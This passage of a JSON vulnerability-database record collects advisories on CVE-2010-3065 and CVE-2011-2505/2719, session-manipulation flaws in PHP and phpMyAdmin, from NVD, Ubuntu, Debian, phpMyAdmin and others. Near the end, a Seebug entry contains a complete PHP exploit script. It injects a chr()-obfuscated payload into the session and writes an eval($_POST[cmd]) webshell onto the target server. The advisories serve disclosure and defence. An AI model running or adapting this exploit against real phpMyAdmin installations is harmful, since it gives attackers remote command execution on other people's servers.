"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3065", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T15:08:56", "description": "libraries/auth/swekey/swekey.auth.lib.php in phpMyAdmin 3.x before 3.3.10.3 and 3.4.x before 3.4.3.2 does not properly manage sessions associated with Swekey authentication, which allows remote attackers to modify the SESSION superglobal array, other superglobal arrays, and certain swekey.auth.lib.php local variables via a crafted query string, a related issue to CVE-2011-2505.", "cvss3": {}, "published": "2011-08-01T19:55:00", "type": "cve", "title": "CVE-2011-2719", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2719"], "modified": "2023-02-13T04:31:00", "cpe": 
["cpe:/a:phpmyadmin:phpmyadmin:3.2.2", "cpe:/a:phpmyadmin:phpmyadmin:3.4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.2", "cpe:/a:phpmyadmin:phpmyadmin:3.1.5", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.2", "cpe:/a:phpmyadmin:phpmyadmin:3.4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.1", "cpe:/a:phpmyadmin:phpmyadmin:3.2.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.8", "cpe:/a:phpmyadmin:phpmyadmin:3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.8.1", "cpe:/a:phpmyadmin:phpmyadmin:3.4.3.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3", "cpe:/a:phpmyadmin:phpmyadmin:3.3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.4.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.3.0", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.0", "cpe:/a:phpmyadmin:phpmyadmin:3.4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.4", "cpe:/a:phpmyadmin:phpmyadmin:3.1.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.6", "cpe:/a:phpmyadmin:phpmyadmin:3.4.3.1", "cpe:/a:phpmyadmin:phpmyadmin:3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.7"], "id": "CVE-2011-2719", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2719", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.3.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.1.0:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-12-02T15:55:47", "description": "libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication\nfeature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 assigns\nvalues to arbitrary parameters referenced in the query string, which allows\nremote attackers to modify the SESSION superglobal array via a crafted\nrequest, related to a \"remote variable manipulation vulnerability.\"\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/phpmyadmin/+bug/806788>\n", "cvss3": {}, "published": "2011-07-14T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2011-07-14T00:00:00", "id": "UB:CVE-2011-2505", "href": "https://ubuntu.com/security/CVE-2011-2505", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-12-02T16:00:10", "description": "The default session serializer in PHP 5.2 through 5.2.13 and 5.3 through\n5.3.2 does not properly handle the PS_UNDEF_MARKER marker, which 
allows\ncontext-dependent attackers to modify arbitrary session variables via a\ncrafted session variable name.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | This is MOPS-2010-060\n", "cvss3": {}, "published": "2010-08-20T00:00:00", "type": "ubuntucve", "title": "CVE-2010-3065", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2010-08-20T00:00:00", "id": "UB:CVE-2010-3065", "href": "https://ubuntu.com/security/CVE-2010-3065", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-02T15:55:35", "description": "libraries/auth/swekey/swekey.auth.lib.php in phpMyAdmin 3.x before 3.3.10.3\nand 3.4.x before 3.4.3.2 does not properly manage sessions associated with\nSwekey authentication, which allows remote attackers to modify the SESSION\nsuperglobal array, other superglobal arrays, and certain\nswekey.auth.lib.php local variables via a crafted query string, a related\nissue to CVE-2011-2505.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=725384>\n", "cvss3": {}, "published": "2011-08-01T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2719", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": 
"AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2719"], "modified": "2011-08-01T00:00:00", "id": "UB:CVE-2011-2719", "href": "https://ubuntu.com/security/CVE-2011-2719", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "phpmyadmin": [{"lastseen": "2023-12-02T15:46:17", "description": "## PMASA-2011-5\n\n**Announcement-ID:** PMASA-2011-5\n\n**Date:** 2011-07-02\n\n**Updated:** 2011-07-03\n\n### Summary\n\nPossible session manipulation in Swekey authentication.\n\n### Description\n\nIt was possible to manipulate the PHP session superglobal using some of the Swekey authentication code. This could open a path for other attacks.\n\n### Severity\n\nWe consider this vulnerability to be critical.\n\n### Affected Versions\n\nThe 3.4.3 and earlier versions are affected.\n\n### Unaffected Versions\n\nBranch 2.11.x is not affected by this.\n\n### Solution\n\nUpgrade to phpMyAdmin 3.3.10.2 or 3.4.3.1 or apply the related patch listed below.\n\n### References\n\nThis issue was found by Frans Pehrson from [Xxor AB](<http://www.xxor.se>). 
[His advisory.](<http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt>)\n\nAssigned CVE ids: [CVE-2011-2505](<https://vulners.com/cve/CVE-2011-2505>)\n\nCWE ids: [CWE-473](<https://cwe.mitre.org/data/definitions/473.html>) [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [7ebd958b2bf59f96fecd5b3322bdbd0b244a7967](<https://github.com/phpmyadmin/phpmyadmin/commit/7ebd958b2bf59f96fecd5b3322bdbd0b244a7967>)\n\nThe following commits have been made on the 3.3 branch to fix this issue:\n\n * [6e6e129f26295c83d67b74e202628a4b8bc49e54](<https://github.com/phpmyadmin/phpmyadmin/commit/6e6e129f26295c83d67b74e202628a4b8bc49e54>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {}, "published": "2011-07-02T00:00:00", "type": "phpmyadmin", "title": "Possible session manipulation in Swekey authentication.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2011-07-03T00:00:00", "id": "PHPMYADMIN:PMASA-2011-5", "href": "https://www.phpmyadmin.net/security/PMASA-2011-5/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:53:53", "description": "A remote variable manipulation vulnerability has been reported in PhpMyAdmin. 
The vulnerability is due to insufficient validation of request parameters. A remote attacker could exploit this vulnerability by sending a malicious request to the server. Successful exploitation could result in modification of superglobal variables.", "cvss3": {}, "published": "2014-09-14T00:00:00", "type": "checkpoint_advisories", "title": "PhpMyAdmin ENV Superglobal Remote Variable Manipulation (CVE-2010-3065)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2019-06-19T00:00:00", "id": "CPAI-2014-1799", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-11-27T19:24:05", "description": "A remote variable manipulation vulnerability has been reported in PhpMyAdmin.", "cvss3": {}, "published": "2013-10-20T00:00:00", "type": "checkpoint_advisories", "title": "PhpMyAdmin Remote Variable Manipulation (CVE-2011-2505)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-2505"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-2986", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-17T20:54:26", "description": "A Session Data Injection vulnerability has been reported in php framework.", "cvss3": {}, "published": "2013-10-20T00:00:00", "type": "checkpoint_advisories", "title": "PHP Session Serializer Session Data Injection (CVE-2010-3065)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3065"], "modified": "2013-01-01T00:00:00", "id": "CPAI-2013-2987", "href": "", "cvss": {"score": 0.0, 
"vector": "NONE"}}], "debiancve": [{"lastseen": "2023-12-02T18:29:08", "description": "libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 assigns values to arbitrary parameters referenced in the query string, which allows remote attackers to modify the SESSION superglobal array via a crafted request, related to a \"remote variable manipulation vulnerability.\"", "cvss3": {}, "published": "2011-07-14T23:55:00", "type": "debiancve", "title": "CVE-2011-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2011-07-14T23:55:00", "id": "DEBIANCVE:CVE-2011-2505", "href": "https://security-tracker.debian.org/tracker/CVE-2011-2505", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-12-02T18:29:08", "description": "libraries/auth/swekey/swekey.auth.lib.php in phpMyAdmin 3.x before 3.3.10.3 and 3.4.x before 3.4.3.2 does not properly manage sessions associated with Swekey authentication, which allows remote attackers to modify the SESSION superglobal array, other superglobal arrays, and certain swekey.auth.lib.php local variables via a crafted query string, a related issue to CVE-2011-2505.", "cvss3": {}, "published": "2011-08-01T19:55:00", "type": "debiancve", "title": "CVE-2011-2719", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2719"], "modified": "2011-08-01T19:55:00", "id": "DEBIANCVE:CVE-2011-2719", "href": "https://security-tracker.debian.org/tracker/CVE-2011-2719", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T04:57:53", "description": "The default session serializer in PHP 5.2 through 5.2.13 and 5.3 through 5.3.2 does not properly handle the PS_UNDEF_MARKER marker, which allows context-dependent attackers to modify arbitrary session variables via a crafted session variable name.", "cvss3": {}, "published": "2010-08-20T20:00:00", "type": "prion", "title": "Default configuration", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2010-12-10T06:44:00", "id": "PRION:CVE-2010-3065", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2010-3065", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T04:47:04", "description": "libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 assigns values to arbitrary parameters referenced in the query string, which allows remote attackers to 
modify the SESSION superglobal array via a crafted request, related to a \"remote variable manipulation vulnerability.\"", "cvss3": {}, "published": "2011-07-14T23:55:00", "type": "prion", "title": "Authentication flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2018-10-09T19:32:00", "id": "PRION:CVE-2011-2505", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2011-2505", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-22T04:47:27", "description": "libraries/auth/swekey/swekey.auth.lib.php in phpMyAdmin 3.x before 3.3.10.3 and 3.4.x before 3.4.3.2 does not properly manage sessions associated with Swekey authentication, which allows remote attackers to modify the SESSION superglobal array, other superglobal arrays, and certain swekey.auth.lib.php local variables via a crafted query string, a related issue to CVE-2011-2505.", "cvss3": {}, "published": "2011-08-01T19:55:00", "type": "prion", "title": "Sql injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2719"], "modified": "2023-02-13T04:31:00", "id": "PRION:CVE-2011-2719", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2011-2719", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:56:18", "description": "No description provided by source.", "cvss3": {}, "published": "2011-12-26T00:00:00", "type": "seebug", "title": "phpMyAdmin3 remote code execute exploit [Not jilei(chicken\\'s ribs)]", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505"], "modified": "2011-12-26T00:00:00", "id": "SSV:26109", "href": "https://www.seebug.org/vuldb/ssvid-26109", "sourceData": "\n #!/usr/bin/php\r\n<?php\r\nprint_r('\r\n+---------------------------------------------------------------------------+\r\npma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\\'s ribs)]\r\nby oldjun(www.oldjun.com)\r\nwelcome to www.t00ls.net\r\nmail: oldjun@gmail.com\r\nAssigned CVE id: CVE-2011-2505\r\n+---------------------------------------------------------------------------+\r\n');\r\n\r\n/**\r\n * working when the directory:"config" exists and is writeable.\r\n**/\r\n \r\nif ($argc < 3) {\r\n print_r('\r\n+---------------------------------------------------------------------------+\r\nUsage: php '.$argv[0].' host path\r\nhost: target server (ip/hostname)\r\npath: path to pma3\r\nExample:\r\nphp '.$argv[0].' localhost /pma/\r\n+---------------------------------------------------------------------------+\r\n');\r\n exit;\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n/**\r\n * Try to determine if the directory:"config" exists\r\n**/\r\necho "[+] Try to determine if the directory:config exists....\\n";\r\n$returnstr=php_request('config/');\r\nif(strpos($returnstr,'404')){\r\n exit("[-] Exploit Failed! 
The directory:config do not exists!\\n");\r\n}\r\n\r\n/**\r\n * Try to get token and sessionid\r\n**/\r\necho "[+] Try to get token and sessionid....\\n";\r\n$result=php_request('index.php');\r\npreg_match('/phpMyAdmin=(\\w{32,40})\\;(.*?)token=(\\w{32})\\&/s', $result, $resp);\r\n$token=$resp[3];\r\n$sessionid=$resp[1];\r\nif($token && $sessionid){\r\n echo "[+] token:$token\\n";\r\n echo "[+] Session ID:$sessionid\\n";\r\n}else{\r\n exit("[-] Can't get token and Session ID,Exploit Failed!\\n");\r\n}\r\n\r\n/**\r\n * Try to insert shell into session\r\n**/\r\necho "[+] Try to insert shell into session....\\n";\r\nphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.\r\n\r\n/**\r\n * Try to create webshell\r\n**/\r\necho "[+] Try to create webshell....\\n";\r\nphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);\r\n/**\r\n * Try to check if the webshell was created successfully\r\n**/\r\necho "[+] Try to check if the webshell was created successfully....\\n";\r\n$content=php_request('config/config.inc.php');\r\nif(strpos($content,'t00ls')){\r\n echo "[+] Congratulations! 
Expoilt successfully....\\n";\r\n echo "[+] Webshell:http://$host{$path}config/a.php eval(\\$_POST[cmd])\\n";\r\n}else{\r\n exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\\n");\r\n}\r\n\r\nfunction php_request($url,$data='',$cookie=''){\r\n global $host, $path;\r\n \r\n $method=$data?'POST':'GET';\r\n \r\n $packet = $method." ".$path.$url." HTTP/1.1\\r\\n";\r\n $packet .= "Accept: */*\\r\\n";\r\n $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\\r\\n";\r\n $packet .= "Host: $host\\r\\n";\r\n $packet .= $data?"Content-Type: application/x-www-form-urlencoded\\r\\n":"";\r\n $packet .= $data?"Content-Length: ".strlen($data)."\\r\\n":"";\r\n $packet .= $cookie?"Cookie: $cookie\\r\\n":"";\r\n $packet .= "Connection: Close\\r\\n\\r\\n";\r\n $packet .= $data?$data:"";\r\n\r\n $fp = fsockopen(gethostbyname($host), 80);\r\n if (!$fp) {\r\n echo 'No response from '.$host; die;\r\n }\r\n fputs($fp, $packet);\r\n\r\n $resp = '';\r\n\r\n while ($fp && !feof($fp))\r\n $resp .= fread($fp, 1024);\r\n\r\n return $resp;\r\n}\r\n \r\n?>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26109", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:09:46", "description": "No description provided by source.", 